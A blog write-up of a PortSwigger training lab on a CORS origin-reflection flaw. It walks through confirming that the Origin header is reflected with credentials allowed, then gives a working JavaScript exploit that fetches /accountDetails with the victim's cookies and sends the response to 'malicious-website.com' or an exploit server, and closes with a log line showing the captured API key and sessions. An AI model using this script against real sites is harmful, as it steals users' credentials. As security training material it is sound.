DEV Community

Cover image for Portswigger’s lab write up: CORS vulnerability with basic origin reflection
Christian Paez
Christian Paez

Posted on

Portswigger’s lab write up: CORS vulnerability with basic origin reflection

#webdev #portswigger #cors #writeup

In this apprentice-level lab, we will exploit a website with a basic CORS vulnerability to obtain a user's private credentials.

Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails that fetches the user's API key:

HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 149 { "username": "wiener", "email": "", "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW", "sessions": [ "cdmflpOO6psYIp3novWUytbSDM9i68X1" ] }
Enter fullscreen mode Exit fullscreen mode

We can see that the Access-Control-Allow-Credentials: true is present, let's try to duplicate this request and change the Origin header to something like Origin: https://example.com and see if this value is reflected, the resulting response will be something like this:

HTTP/1.1 200 OK Access-Control-Allow-Origin: <https://example.com> Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 149 { "username": "wiener", "email": "", "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW", "sessions": [ "cdmflpOO6psYIp3novWUytbSDM9i68X1" ] }
Enter fullscreen mode Exit fullscreen mode

The Origin set in the request headers is present in the Access-Control-Allow-Origin response headers, this confirms us that this request has a CORS vulnerability, let's use the reading material's template to craft our exploit:

var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','<https://vulnerable-website.com/sensitive-victim-data>',true); req.withCredentials = true; req.send(); function reqListener() { location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText); };
Enter fullscreen mode Exit fullscreen mode

We have to modify out exploit to include the vulnerable website's /accountDetails endpoint and our exploit server /log endpoint, after including the code in a <script> tag the final exploit will look like this:

<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','${LAB_URL}/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='{$EXPLOIT_SERVER_URL}/log?key='+encodeURIComponent(this.responseText); }; </script>
Enter fullscreen mode Exit fullscreen mode

After sending this exploit to our victim we can read their credentials in our exploit server logs:

181.63.62.250 2022-12-07 03:10:36 +0000 "GET /log?key=%7B%0A%20%20%22username%22%3A%20%22wiener%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22OiwIQ3xcR32ilUvyyai9tSWuUnzjfrzp%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%228QJ2k8dqE1vVtNcHmZixScfFPDENAzvo%22%2C%0A%20%20%20%20%22JNIc4VJZlskPdwjcf2C0fAREYXnaNATt%22%0A%20%20%5D%0A%7D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
Enter fullscreen mode Exit fullscreen mode

Check out this write up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-basic-origin-reflection/

Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-basic-origin-reflection

Top comments (0)